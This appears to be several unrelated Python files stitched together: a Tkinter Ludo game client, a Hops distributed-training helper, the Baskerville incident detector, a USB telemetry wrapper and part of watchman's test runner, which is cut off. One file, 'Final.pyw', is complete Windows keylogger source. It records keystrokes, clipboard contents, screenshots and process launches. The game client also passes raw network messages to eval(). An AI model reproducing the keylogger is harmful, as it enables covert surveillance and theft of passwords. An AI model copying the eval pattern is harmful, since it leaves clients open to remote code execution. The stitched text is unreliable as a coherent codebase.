rollButton.destroy()
playerTurn = False
if(playerType == 'player1'):
SERVER.send(f'{value}player2Turn'.encode())
if(playerType == 'player2'):
SERVER.send(f'{value}player1Turn'.encode())
def leftBoard():
global gameWindow
global leftBoxes
global screen_height
xPos = 30
for box in range(0,11):
if(box == 0):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
boxLabel.place(x=xPos, y=screen_height/2 - 88)
leftBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2- 100)
leftBoxes.append(boxLabel)
xPos +=75
def rightBoard():
global gameWindow
global rightBoxes
global screen_height
xPos = 988
for box in range(0,11):
if(box == 10):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
boxLabel.place(x=xPos, y=screen_height/2-88)
rightBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2 - 100)
rightBoxes.append(boxLabel)
xPos +=75
def finishingBox():
global gameWindow
global finishingBox
global screen_width
global screen_height
finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
finishingBox.place(x=screen_width/2 - 60, y=screen_height/2 -160)
def gameWindow():
global gameWindow
global canvas2
global screen_width
global screen_height
global dice
global winingMessage
global resetButton
gameWindow = Tk()
gameWindow.title("Ludo Ladder")
gameWindow.attributes('-fullscreen',True)
screen_width = gameWindow.winfo_screenwidth()
screen_height = gameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas2 = Canvas( gameWindow, width = 500,height = 500)
canvas2.pack(fill = "both", expand = True)
# Display image
canvas2.create_image( 0, 0, image = bg, anchor = "nw")
# Add Text
canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
# ------------ Boilerplate Code
# Declaring Wining Message
winingMessage = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 250, text = "", font=("Chalkboard SE",100), fill='#fff176')
# Creating Reset Button
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
# ------------ Boilerplate End
leftBoard()
rightBoard()
finishingBox()
global rollButton
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
global playerTurn
global playerType
global playerName
# Additional Activity
global player1Name
global player2Name
global player1Label
global player2Label
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if(playerType == 'player1' and playerTurn):
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
else:
rollButton.pack_forget()
# Creating Dice with value 1
dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
# Creating name board
player1Label = canvas2.create_text(400, screen_height/2 + 100, text = player1Name, font=("Chalkboard SE",80), fill='#fff176' )
player2Label = canvas2.create_text(screen_width - 300, screen_height/2 + 100, text = player2Name, font=("Chalkboard SE",80), fill='#fff176' )
# Creating Score Board
player1ScoreLabel = canvas2.create_text(400, screen_height/2 - 160, text = player1Score, font=("Chalkboard SE",80), fill='#fff176' )
player2ScoreLabel = canvas2.create_text(screen_width - 300, screen_height/2 - 160, text = player2Score, font=("Chalkboard SE",80), fill='#fff176' )
gameWindow.resizable(True, True)
gameWindow.mainloop()
def saveName():
global SERVER
global playerName
global nameWindow
global nameEntry
playerName = nameEntry.get()
nameEntry.delete(0, END)
nameWindow.destroy()
SERVER.send(playerName.encode())
gameWindow()
def askPlayerName():
global playerName
global nameEntry
global nameWindow
global canvas1
nameWindow = Tk()
nameWindow.title("Ludo Ladder")
nameWindow.attributes('-fullscreen',True)
screen_width = nameWindow.winfo_screenwidth()
screen_height = nameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas1 = Canvas( nameWindow, width = 500,height = 500)
canvas1.pack(fill = "both", expand = True)
# Display image
canvas1.create_image( 0, 0, image = bg, anchor = "nw")
canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
nameWindow.resizable(True, True)
nameWindow.mainloop()
#--------- Boilerplate Code Start---------------
def restGame():
global SERVER
SERVER.send("reset game".encode())
def handleWin(message):
global playerType
global rollButton
global canvas2
global winingMessage
global screen_width
global screen_height
global resetButton
if('Red' in message):
if(playerType == 'player2'):
rollButton.destroy()
if('Yellow' in message):
if(playerType == 'player1'):
rollButton.destroy()
message = message.split(".")[0] + "."
canvas2.itemconfigure(winingMessage, text = message)
resetButton.place(x = screen_width / 2 - 80, y = screen_height - 220)
def updateScore(message):
global canvas2
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if('Red' in message):
player1Score +=1
if('Yellow' in message):
player2Score +=1
canvas2.itemconfigure(player1ScoreLabel, text = player1Score)
canvas2.itemconfigure(player2ScoreLabel, text = player2Score)
def handleResetGame():
global canvas2
global playerType
global gameWindow
global rollButton
global dice
global screen_width
global screen_height
global playerTurn
global rightBoxes
global leftBoxes
global finishingBox
global resetButton
global winingMessage
global winingFunctionCall
canvas2.itemconfigure(dice, text='\u2680')
# Handling Reset Game
if(playerType == 'player1'):
# Creating roll dice button
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
playerTurn = True
if(playerType == 'player2'):
playerTurn = False
for rBox in rightBoxes[-2::-1]:
rBox.configure(bg='white')
for lBox in leftBoxes[1:]:
lBox.configure(bg='white')
finishingBox.configure(bg='green')
canvas2.itemconfigure(winingMessage, text="")
resetButton.destroy()
# Again Recreating Reset Button for next game
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
winingFunctionCall = 0
#----------------- Boilerplate Code End ---------------
def recivedMsg():
global SERVER
global playerType
global playerTurn
global rollButton
global screen_width
global screen_height
global canvas2
global dice
global gameWindow
global player1Name
global player2Name
global player1Label
global player2Label
global winingFunctionCall
while True:
message = SERVER.recv(2048).decode()
if('player_type' in message):
recvMsg = eval(message)
playerType = recvMsg['player_type']
playerTurn = recvMsg['turn']
elif('player_names' in message):
players = eval(message)
players = players["player_names"]
for p in players:
if(p["type"] == 'player1'):
player1Name = p['name']
if(p['type'] == 'player2'):
player2Name = p['name']
elif('⚀' in message):
# Dice with value 1
canvas2.itemconfigure(dice, text='\u2680')
elif('⚁' in message):
# Dice with value 2
canvas2.itemconfigure(dice, text='\u2681')
elif('⚂' in message):
# Dice with value 3
canvas2.itemconfigure(dice, text='\u2682')
elif('⚃' in message):
# Dice with value 4
canvas2.itemconfigure(dice, text='\u2683')
elif('⚄' in message):
# Dice with value 5
canvas2.itemconfigure(dice, text='\u2684')
elif('⚅' in message):
# Dice with value 6
canvas2.itemconfigure(dice, text='\u2685')
#--------- Boilerplate Code Start--------
elif('wins the game.' in message and winingFunctionCall == 0):
winingFunctionCall +=1
handleWin(message)
# Addition Activity
updateScore(message)
elif(message == 'reset game'):
handleResetGame()
#--------- Boilerplate Code End--------
#creating rollbutton
if('player1Turn' in message and playerType == 'player1'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
elif('player2Turn' in message and playerType == 'player2'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
# Deciding player turn
if('player1Turn' in message or 'player2Turn' in message):
diceChoices=['⚀','⚁','⚂','⚃','⚄','⚅']
diceValue = diceChoices.index(message[0]) + 1
if('player2Turn' in message):
movePlayer1(diceValue)
if('player1Turn' in message):
movePlayer2(diceValue)
# Additional Activity
# Creating Name Board
if(player1Name != 'joining' and canvas2):
canvas2.itemconfigure(player1Label, text=player1Name)
if(player2Name != 'joining' and canvas2):
canvas2.itemconfigure(player2Label, text=player2Name)
def setup():
global SERVER
global PORT
global IP_ADDRESS
PORT = 8000
IP_ADDRESS = '127.0.0.1'
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.connect((IP_ADDRESS, PORT))
thread = Thread(target=recivedMsg)
thread.start()
askPlayerName()
setup()
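# Illustrative sketch (not called by the game): how the Unicode die faces used
# above map back to numeric values, mirroring what recivedMsg() does with
# diceChoices.index(message[0]) + 1. The function name is a placeholder.
def dice_glyph_to_value(glyph):
    diceChoices = ['\u2680', '\u2681', '\u2682', '\u2683', '\u2684', '\u2685']
    return diceChoices.index(glyph) + 1  # '⚀' -> 1 ... '⚅' -> 6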
|
Final.pyw
|
import multiprocessing
import os
import sys
import time
import pythoncom
import pyHook
import win32con
import win32clipboard
import win32gui
import win32ui
import wmi
def take_screenshot():
# Gather the desktop information
desktop=win32gui.GetDesktopWindow()
left, top, right, bottom=win32gui.GetWindowRect(desktop)
height=bottom - top
width=right - left
# Prepare objects for screenshot
win_dc = win32gui.GetWindowDC(desktop)
ui_dc=win32ui.CreateDCFromHandle(win_dc)
# Create screenshot file
bitmap = win32ui.CreateBitmap()
bitmap.CreateCompatibleBitmap(ui_dc, width, height)
compat_dc=ui_dc.CreateCompatibleDC()
compat_dc.SelectObject(bitmap)
#Capture screenshot
compat_dc.BitBlt((0,0),(width, height) , ui_dc, (0,0), win32con.SRCCOPY)
bitmap.Paint(compat_dc)
timestr = time.strftime("_%Y%m%d_%H%M%S")
bitmap.SaveBitmapFile(compat_dc,'screenshot'+timestr+'.bmp')
# Release objects to prevent memory issues
ui_dc.DeleteDC()
compat_dc.DeleteDC()
win32gui.ReleaseDC(desktop, win_dc)
win32gui.DeleteObject(bitmap.GetHandle())
def get_clipboard():
# Open the clipboard
win32clipboard.OpenClipboard()
# Grab the text on the clipboard
d=win32clipboard.GetClipboardData(win32con.CF_TEXT) # get clipboard data
# Close & Return the clipboard
win32clipboard.CloseClipboard()
return d
def OnKeyboardEvent(event):
# Open output log file
timestr = time.strftime("_%Y%m%d_%H00")
keylog_file = 'keylog_output{0}.txt'.format(timestr)
f = open(keylog_file,'a')
# Allow keylogger to be stopped if ctrl-e pressed
if event.Ascii == 5:
f.write('Closing Down Keylogger')
exit(1)
# Otherwise, capture the keystrokes!
    elif event.Ascii != 0 and event.Ascii != 8:
# Handles a 'Enter' key press
if event.Ascii == 13:
keylogs = '\n'
f.write(keylogs)
# Capture Screenshot
take_screenshot()
# Capture Clipboard on copy/cut/paste
        elif event.Ascii == 3 or event.Ascii == 22 or event.Ascii == 24:
keylogs = get_clipboard()
f.write("\n\nClipboard: ")
f.write(keylogs)
f.write('\n\n')
        # Captures every other ASCII character
else:
keylogs = chr(event.Ascii)
f.write(keylogs)
# Release the file
f.close()
def keylogger_main():
# Create a hook manager object
hm=pyHook.HookManager()
try:
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
pass
# Set the hook
hm.HookKeyboard()
# Wait forever for events
pythoncom.PumpMessages()
def process_logger_main():
w = wmi.WMI()
created = w.Win32_Process.watch_for("creation")
timestr = time.strftime("_%Y%m%d_%H00")
process_file = 'process_logger{0}.txt'.format(timestr)
pf = open(process_file, 'a')
while True:
c = created()
pf.write("\n\n====")
pf.write(str(c))
pf.flush()
pf.close()
def main():
# Setup Process 1: Keylogger
proc1 = multiprocessing.Process(target=keylogger_main)
proc1.start()
# Setup Process 2: Process Logger
proc2 = multiprocessing.Process(target=process_logger_main)
proc2.start()
    # Stop the process logger when the keylogger process exits.
while True:
if not proc1.is_alive():
proc2.terminate()
break
else:
time.sleep(30)
# Exit
sys.exit(1)
if __name__ == '__main__':
main()
|
mirrored.py
|
"""
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitate development by hiding the complexity of interacting with Hops services.
"""
import os
from hops import devices, tensorboard, hdfs
from hops.experiment_impl.util import experiment_utils
from hops import util
import pydoop.hdfs
import threading
import time
import socket
import json
from . import allreduce_reservation
def _run(sc, map_fun, run_id, local_logdir=False, name="no-name", evaluator=False):
"""
Args:
sc:
map_fun:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | MirroredStrategy - Distributed Training".format(name))
server = allreduce_reservation.Server(num_executions)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, util.num_executors()))
logdir = experiment_utils._get_logdir(app_id, run_id)
print('Finished Experiment \n')
path_to_return = logdir + '/.outputs.json'
if pydoop.hdfs.path.exists(path_to_return):
with pydoop.hdfs.open(path_to_return, "r") as fi:
contents = fi.read()
fi.close()
return logdir, json.loads(contents)
return logdir, None
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, num_executors):
"""
Args:
app_id:
run_id:
map_fun:
local_logdir:
server_addr:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
is_chief = False
logdir = None
tb_hdfs_path = None
try:
host = experiment_utils._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
client = allreduce_reservation.Client(server_addr)
host_port = host + ":" + str(port)
client.register({"worker": host_port, "index": executor_num})
cluster = client.await_reservations()
tmp_socket.close()
client.close()
task_index = experiment_utils._find_index(host_port, cluster)
if task_index == -1:
cluster["task"] = {"type": "chief", "index": 0}
else:
cluster["task"] = {"type": "worker", "index": task_index}
evaluator_node = None
if evaluator:
last_worker_index = len(cluster["cluster"]["worker"])-1
evaluator_node = cluster["cluster"]["worker"][last_worker_index]
cluster["cluster"]["evaluator"] = [evaluator_node]
del cluster["cluster"]["worker"][last_worker_index]
if evaluator_node == host_port:
cluster["task"] = {"type": "evaluator", "index": 0}
print('TF_CONFIG: {} '.format(cluster))
if num_executors > 1:
os.environ["TF_CONFIG"] = json.dumps(cluster)
is_chief = (cluster["task"]["type"] == "chief")
is_evaluator = (cluster["task"]["type"] == "evaluator")
logfile = experiment_utils._init_logger(experiment_utils._get_logdir(app_id, run_id), role=cluster["task"]["type"], index=cluster["task"]["index"])
if is_chief:
logdir = experiment_utils._get_logdir(app_id, run_id)
tb_hdfs_path, tb_pid = tensorboard._register(logdir, logdir, executor_num, local_logdir=local_logdir)
elif is_evaluator:
logdir = experiment_utils._get_logdir(app_id, run_id)
tensorboard.events_logdir = logdir
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
if is_chief:
experiment_utils._handle_return_simple(retval, experiment_utils._get_logdir(app_id, run_id), logfile)
task_end = time.time()
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
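# Illustrative sketch (not part of the original module): the general shape of
# the TF_CONFIG dictionary assembled in _wrapper_fun before map_fun() runs.
# Host/port values are placeholders; the "evaluator" entry only exists when
# evaluator=True, and the task type becomes "chief" for the executor whose
# host:port is not present in the worker list.
_EXAMPLE_TF_CONFIG = {
    "cluster": {
        "worker": ["10.0.0.2:2222", "10.0.0.3:2222"],
        "evaluator": ["10.0.0.4:2222"],
    },
    "task": {"type": "worker", "index": 0},
}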
|
incident_detector.py
|
# Copyright (c) 2021, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import threading
import time
import sys
from baskerville.db import set_up_db
from baskerville.db.models import Attack
from baskerville.util.db_reader import DBReader
import datetime
import pandas as pd
class IncidentDetector:
def __init__(self,
db_config,
time_bucket_in_seconds=120,
time_horizon_in_seconds=600,
check_interval_in_seconds=120,
stat_refresh_period_in_minutes=30,
stat_window_in_hours=1,
min_traffic=3,
min_traffic_incident=50,
min_challenged_portion_incident=0.5,
sigma_score=2.5,
sigma_traffic=2.5,
dashboard_url_prefix=None,
dashboard_minutes_before=60,
dashboard_minutes_after=120,
logger=None,
mail_sender=None,
emails=None):
super().__init__()
self.kill = threading.Event()
self.check_interval_in_seconds = check_interval_in_seconds
self.time_bucket_in_seconds = time_bucket_in_seconds
self.time_horizon_in_seconds = time_horizon_in_seconds
self.sigma_score = sigma_score
self.sigma_traffic = sigma_traffic
self.min_traffic = min_traffic
self.min_traffic_incident = min_traffic_incident
self.min_challenged_portion_incident = min_challenged_portion_incident
self.db_config = db_config
if logger:
self.logger = logger
else:
self.logger = logging.getLogger('baskerville')
            self.logger.addHandler(logging.StreamHandler(sys.stdout))
self.mail_sender = mail_sender
self.emails = emails
self.thread = None
self.last_timestamp = None
self.average_window_in_hours = stat_window_in_hours
self.stats_reader = DBReader(db_config, refresh_period_in_minutes=stat_refresh_period_in_minutes, logger=logger)
self.reader_traffic = DBReader(db_config, refresh_period_in_minutes=stat_refresh_period_in_minutes,
logger=logger)
self.candidates = None
self.incidents = None
self.dashboard_url_prefix = dashboard_url_prefix
self.dashboard_minutes_before = dashboard_minutes_before
self.dashboard_minutes_after = dashboard_minutes_after
self.lock = threading.Lock()
def _run(self):
self.logger.info('Starting incident detector...')
while True:
self._detect()
is_killed = self.kill.wait(self.check_interval_in_seconds)
if is_killed:
break
def start(self):
if self.thread is not None:
return
self.thread = threading.Thread(target=self._run)
self.thread.start()
def stop(self):
if self.thread is None:
return
self.kill.set()
self.thread.join()
def _get_dashboard_url(self, start, target):
ts_from = start - datetime.timedelta(minutes=self.dashboard_minutes_before)
ts_to = start + datetime.timedelta(minutes=self.dashboard_minutes_after)
ts_from = int(time.mktime(ts_from.timetuple()))
ts_to = int(time.mktime(ts_to.timetuple()))
return f'{self.dashboard_url_prefix}from={ts_from}000&to={ts_to}000&var-Host={target}'
def _read_sample(self):
session, engine = set_up_db(self.db_config.__dict__)
try:
stop = (datetime.datetime.utcnow() - 2 * datetime.timedelta(
seconds=self.time_horizon_in_seconds)).strftime("%Y-%m-%d %H:%M:%S %z")
query = f'SELECT floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds} AS "time", target, ' \
f'count(distinct ip) as traffic, (sum(prediction*1.0) / count(ip)) as challenged_portion ' \
f'FROM request_sets WHERE stop > \'{stop}\' ' \
f'and floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds} in ' \
f'(' \
f' select max(floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds}) from request_sets ' \
f' WHERE stop > \'{stop}\' ' \
f' ) ' \
' group by 1, 2 order by 1'
data = pd.read_sql(query, engine)
if data.empty:
return None
if self.last_timestamp is not None:
if data['time'][0] == self.last_timestamp:
return None
self.last_timestamp = data['time'][0]
return data
except Exception as e:
self.logger.error(str(e))
return None
finally:
session.close()
engine.dispose()
def get_hosts_with_incidents(self):
with self.lock:
if self.incidents is None or self.incidents.empty:
return []
return self.incidents['target'].tolist()
def _start_incidents(self, anomalies):
if anomalies is None or anomalies.empty:
return
if self.incidents is None or self.incidents.empty:
new_incidents = anomalies
else:
new_incidents = pd.merge(anomalies, self.incidents[['target']], how='outer', indicator=True)
new_incidents = new_incidents[new_incidents['_merge'] == 'left_only']
new_incidents = new_incidents.drop('_merge', 1)
new_incidents = new_incidents[new_incidents['traffic'] > self.min_traffic_incident]
if new_incidents.empty:
return
# save the new incidents
new_incidents['id'] = 0
new_incidents['start'] = pd.to_datetime(new_incidents['time'], unit='s', utc=True)
new_incidents = new_incidents.drop('time', 1)
session, engine = set_up_db(self.db_config.__dict__)
try:
for index, row in new_incidents.iterrows():
start = row['start'].strftime('%Y-%m-%d %H:%M:%SZ')
attack = Attack()
attack.start = start
attack.target = row['target']
attack.detected_traffic = row['traffic']
attack.anomaly_traffic_portion = row['challenged_portion']
dashboard_url = self._get_dashboard_url(row['start'], row['target'])
attack.dashboard_url = dashboard_url
session.add(attack)
session.commit()
new_incidents.at[index, 'id'] = attack.id
target = row['target']
self.logger.info(f'New incident, target={target}, id={attack.id}, '
f'traffic={row["traffic"]:.0f} ({row["avg_traffic"]:.0f}) '
f'anomaly_portion={row["challenged_portion"]:.2f} '
f'({row["avg_challenged_portion"]:.2f}) '
f'url="{dashboard_url}" '
)
if self.mail_sender and self.emails:
self.mail_sender.send(self.emails,
f'Incident {attack.id}, target = {target}',
f'Baskerville detected a new incident:\n\n'
f'ID = {attack.id}\n'
f'Targeted host = {target}\n'
f'Timestamp = {start}\n\n'
f'Anomaly traffic portion = {attack.anomaly_traffic_portion:.2f}\n'
f'Unique IPs (1st batch) = {attack.detected_traffic:.0f}\n'
f'Dashboard URL : {dashboard_url}'
)
except Exception as e:
self.logger.error(str(e))
return
finally:
session.close()
engine.dispose()
if self.incidents is None or self.incidents.empty:
self.incidents = new_incidents
return
self.incidents = pd.concat([self.incidents, new_incidents])
def _stop_incidents(self, regulars):
if self.incidents is None or self.incidents.empty:
return
stopped_incidents = pd.merge(self.incidents, regulars[['target', 'time']], how='inner', on='target')
if len(stopped_incidents) == 0:
return
stopped_incidents['stop'] = pd.to_datetime(stopped_incidents['time'], unit='s', utc=True)
stopped_incidents = stopped_incidents.drop('time', 1)
# update stop timestamp in the database
session, engine = set_up_db(self.db_config.__dict__)
try:
for index, row in stopped_incidents.iterrows():
session.query(Attack).filter(Attack.id == row['id']).update(
{'stop': row['stop'].strftime('%Y-%m-%d %H:%M:%SZ')})
target = row['target']
attack_id = row['id']
self.logger.info(f'Incident finished, target={target}, id = {attack_id}')
session.commit()
except Exception as e:
self.logger.error(str(e))
return
finally:
session.close()
engine.dispose()
# remove stopped incidents
self.incidents = pd.merge(self.incidents,
stopped_incidents[['target']], how='outer', on='target', indicator=True)
self.incidents = self.incidents[self.incidents['_merge'] == 'left_only']
self.incidents = self.incidents.drop('_merge', 1)
def _detect(self):
self.logger.info('Checking for new incidents...')
stop = (datetime.datetime.utcnow() - datetime.timedelta(
hours=self.average_window_in_hours)).strftime("%Y-%m-%d %H:%M:%S %z")
self.stats_reader.set_query(
f'select target, avg(traffic) as avg_traffic, stddev(traffic) as stddev_traffic, '
f'avg(challenged_portion) as avg_challenged_portion, '
f'stddev(challenged_portion) as stddev_challenged_portion from'
f'('
f'SELECT floor(extract(epoch from stop)/120)*120 AS "time", target, count(ip) as traffic, '
f'(sum(prediction*1.0) / count(ip)) as challenged_portion '
f'FROM request_sets WHERE stop > \'{stop}\' '
f'group by 1, 2'
f') a '
f'group by target'
)
stats = self.stats_reader.get()
if stats is None:
return
stats = stats[(~stats['avg_traffic'].isnull()) & (~stats['stddev_traffic'].isnull())
& (~stats['avg_challenged_portion'].isnull()) & (~stats['stddev_challenged_portion'].isnull())
& (stats['avg_traffic'] > self.min_traffic)
& (stats['avg_challenged_portion'] > 0)
& (stats['avg_challenged_portion'] < 0.6)]
sample = self._read_sample()
if sample is None:
return
batch = pd.merge(sample, stats, how='left', on='target')
condition = (batch['challenged_portion'] > (batch['avg_challenged_portion'] +
self.sigma_score * batch['stddev_challenged_portion'])) & \
(batch['traffic'] > (batch['avg_traffic'] + self.sigma_traffic * batch['stddev_traffic'])) & \
(batch['challenged_portion'] > self.min_challenged_portion_incident)
anomalies = batch[condition]
regulars = batch[~condition]
with self.lock:
self._stop_incidents(regulars)
self._start_incidents(anomalies)
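# Illustrative sketch (not part of the original module): the anomaly rule used
# in _detect() applied to a toy frame. A target is flagged when both its
# challenged portion and its traffic exceed their historical mean by
# sigma * stddev, and the challenged portion is above the configured minimum.
# The data and thresholds below are placeholders.
def _sigma_rule_sketch():
    batch = pd.DataFrame({
        'target': ['a.example', 'b.example'],
        'traffic': [500, 40],
        'challenged_portion': [0.9, 0.1],
        'avg_traffic': [50, 45],
        'stddev_traffic': [10, 5],
        'avg_challenged_portion': [0.1, 0.1],
        'stddev_challenged_portion': [0.05, 0.05],
    })
    sigma_score, sigma_traffic, min_challenged = 2.5, 2.5, 0.5
    condition = (batch['challenged_portion'] >
                 batch['avg_challenged_portion'] + sigma_score * batch['stddev_challenged_portion']) & \
                (batch['traffic'] >
                 batch['avg_traffic'] + sigma_traffic * batch['stddev_traffic']) & \
                (batch['challenged_portion'] > min_challenged)
    return batch[condition]  # only 'a.example' satisfies all three conditions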
|
UsbReceiver.py
|
import threading
import Queue
# The low-level driver class is aliased so it does not clash with the wrapper class of the same name defined below
from UsbReceiver import UsbReceiver as _DriverUsbReceiver
class Cmds():
def __init__(self, normalizedVoltage, secondCommand):
self.NormalizedVoltage = normalizedVoltage
self.SecondCommand = secondCommand
class Tlm():
def __init__(self):
        self.Position = 0.0
self.Velocity = 0.0
self.NewTelemetry = 0.0
class UsbReceiver():
def __init__(self, portName, commFrequency):
        self.usbReceiver = _DriverUsbReceiver()
self.usbReceiver.PortName = portName
self.usbReceiver.CommFrequency = commFrequency
self.Connected = False
self.Active = False
self.CommThread = threading.Thread(target=self.__usb_comm_thread__)
self.CommandDataQueue = Queue.LifoQueue(maxsize=5)
self.TelemetryDataQueue = Queue.LifoQueue(maxsize=5)
def Connect(self):
self.usbReceiver.Connect()
self.Connected = self.usbReceiver.Connected
self.Active = self.usbReceiver.Active
return self.Connected and self.Active
def Start(self):
if (self.Connected and self.Active):
self.CommThread.start()
print "Comm started."
return True
else:
print "Can't start comm. Not connected."
return False
def Stop(self):
self.Active = False
self.CommThread.join()
def SendCommands(self, cmds):
if(isinstance(cmds, Cmds)):
if (self.CommandDataQueue.full()):
self.CommandDataQueue.get()
self.CommandDataQueue.put(cmds)
return True
else:
print "Invalid command. Not sending."
return False
def RcvTlm(self):
return self.TelemetryDataQueue.get()
def __load__(self):
if (self.CommandDataQueue.empty()):
return
cmd = self.CommandDataQueue.get()
self.usbReceiver.NormalizedVoltage = cmd.NormalizedVoltage
self.usbReceiver.SecondCommand = cmd.SecondCommand
def __unload__(self):
tlm = Tlm()
tlm.Position = self.usbReceiver.Position
tlm.Velocity = self.usbReceiver.Velocity
tlm.NewTelemetry = self.usbReceiver.NewTelemetry
if (self.TelemetryDataQueue.full()):
self.TelemetryDataQueue.get()
self.TelemetryDataQueue.put(tlm)
def __usb_comm_thread__(self):
while(self.Connected and self.Active):
try:
self.__load__()
self.usbReceiver.RunComm()
self.__unload__()
except KeyboardInterrupt:
print 'Closing connection ... \n'
return
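# Illustrative sketch (not called): a typical life cycle for the wrapper class
# above. The port name and command values are placeholders.
def _usb_receiver_sketch():
    receiver = UsbReceiver(portName="COM3", commFrequency=100)
    if receiver.Connect():
        receiver.Start()
        receiver.SendCommands(Cmds(normalizedVoltage=0.5, secondCommand=0))
        tlm = receiver.RcvTlm()  # blocks until a telemetry sample is queued
        print "Position:", tlm.Position, "Velocity:", tlm.Velocity
        receiver.Stop()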
|
runtests.py
|
#!/usr/bin/env python3
# vim:ts=4:sw=4:et:
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import json
import math
import multiprocessing
import os
import os.path
import random
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import unittest
# in the FB internal test infra, ensure that we are running from the
# dir that houses this script rather than some other higher level dir
# in the containing tree. We can't use __file__ to determine this
# because our PAR machinery can generate a name like /proc/self/fd/3/foo
# which won't resolve to anything useful by the time we get here.
if not os.path.exists("runtests.py") and os.path.exists("watchman/runtests.py"):
os.chdir("watchman")
# Ensure that we can find pywatchman and integration tests (if we're not the
# main module, a wrapper is probably loading us up and we shouldn't screw around
# with sys.path).
if __name__ == "__main__":
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
sys.path.insert(1, os.path.join(os.getcwd(), "integration"))
sys.path.insert(1, os.path.join(os.getcwd(), "integration", "facebook"))
# Only Python 3.5+ supports native asyncio
has_asyncio = sys.version_info >= (3, 5)
if has_asyncio:
sys.path.insert(0, os.path.join(os.getcwd(), "tests", "async"))
import asyncio
try:
import queue
except Exception:
import Queue
queue = Queue
parser = argparse.ArgumentParser(
description="Run the watchman unit and integration tests"
)
parser.add_argument("-v", "--verbosity", default=2, help="test runner verbosity")
parser.add_argument(
"--keep",
action="store_true",
help="preserve all temporary files created during test execution",
)
parser.add_argument(
"--keep-if-fail",
action="store_true",
help="preserve all temporary files created during test execution if failed",
)
parser.add_argument("files", nargs="*", help="specify which test files to run")
parser.add_argument(
"--method", action="append", help="specify which python test method names to run"
)
def default_concurrency():
# Python 2.7 hangs when we use threads, so avoid it
# https://bugs.python.org/issue20318
if sys.version_info >= (3, 0):
